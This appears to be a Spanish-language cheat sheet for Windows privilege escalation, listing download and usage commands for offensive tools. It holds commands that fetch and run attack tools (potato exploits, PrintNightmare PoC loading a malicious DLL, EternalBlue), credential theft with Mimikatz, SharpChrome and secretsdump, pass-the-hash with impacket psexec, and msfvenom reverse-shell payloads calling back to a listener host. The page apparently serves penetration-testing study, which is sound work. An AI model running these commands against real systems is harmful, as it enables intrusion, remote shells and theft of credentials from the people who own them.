Skip to content

REFERENCIAS Y DESCARGAS - Windows Privilege Escalation

Herramientas de Enumeración

WinPEAS

powershell
wget https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEASx64.exe
iwr -uri "https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEASx64.exe" -OutFile winpeas.exe

PrivescCheck

powershell
iwr -uri "https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1" -OutFile PrivescCheck.ps1

WES-NG (Windows Exploit Suggester - Next Generation)

bash
git clone https://github.com/bitsadmin/wesng.git
cd wesng
python3 wes.py --update
python3 wes.py sysinfo.txt

Metasploit Framework

bash
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100

Herramientas de Escalación - SeImpersonate

JuicyPotato

powershell
iwr -uri "https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe" -OutFile JuicyPotato.exe

SigmaPotato (Moderna, Recomendada)

powershell
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
iwr -uri "https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe" -OutFile SigmaPotato.exe

PrintSpoofer

powershell
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -OutFile PrintSpoofer.exe

RogueWinRM

powershell
wget https://github.com/antonioCoco/RogueWinRM/releases/latest

Herramientas de Post-Explotación

Mimikatz

bash
wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220519/mimikatz_trunk.zip
unzip mimikatz_trunk.zip
cd mimikatz/x64
./mimikatz.exe

SharpChrome

powershell
.\SharpChrome.exe logins /unprotect

PowerUp

powershell
iwr -uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1" -OutFile PowerUp.ps1
. .\PowerUp.ps1
Invoke-AllChecks

Invoke-SessionGopher

powershell
iwr -uri "https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1" -OutFile SessionGopher.ps1
Invoke-SessionGopher -Target localhost

LaZagne

bash
wget https://github.com/AlessandroZ/LaZagne/releases/latest

Exploits de Kernel

PrintNightmare (CVE-2021-1675)

powershell
iwr -uri "https://raw.githubusercontent.com/calebstewart/CVE-2021-1675/main/Invoke-Nightmare.ps1" -OutFile Invoke-Nightmare.ps1
Invoke-Nightmare -DriverPath C:\malicioso.dll

HiveNightmare (CVE-2021-36934)

  • PoC: Acceder a C:\System Volume Information\RegBack\
  • Usar secretsdump de impacket para extraer hashes

CVE-2023-29360

bash
searchsploit CVE-2023-29360

Herramientas de Transferencia

nc.exe (Netcat para Windows)

powershell
iwr -uri "https://eternallybored.org/misc/netcat/netcat-win32-1.12.zip" -OutFile nc.zip

msfvenom (Generador de Payloads)

bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f dll -o shell.dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f msi -o shell.msi

Impacket

bash
python3 -m impacket.psexec -hashes LM:NTLM usuario@192.168.1.100
python3 -m impacket.secretsdump -sam sam.hive -system system.hive LOCAL

Herramientas de Análisis

Accesschk

powershell
iwr -uri "https://live.sysinternals.com/accesschk64.exe" -OutFile accesschk.exe
.\accesschk.exe -qlc servicio

Process Explorer

powershell
iwr -uri "https://live.sysinternals.com/procexp64.exe" -OutFile procexp.exe

Process Hacker

powershell
# Descarga manual desde sitio oficial

Referencias Oficiales

GTFOBins (para técnicas de escape)

LOLBINS (Living Off The Land Binaries)

Microsoft Docs

Priv2Admin


Instalación Rápida en Kali

bash
# Actualizar
sudo apt update && sudo apt upgrade -y

# Herramientas básicas
sudo apt install -y git wget curl python3 python3-pip

# Python packages
pip3 install impacket pycryptodome

# Clonar repositorios útiles
git clone https://github.com/carlospolop/PEASS-ng.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
git clone https://github.com/gentilkiwi/mimikatz.git

# Descargar herramientas
wget https://github.com/carlospolop/PEASS-ng/releases/download/20240804-27c05ab0/winPEASx64.exe
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1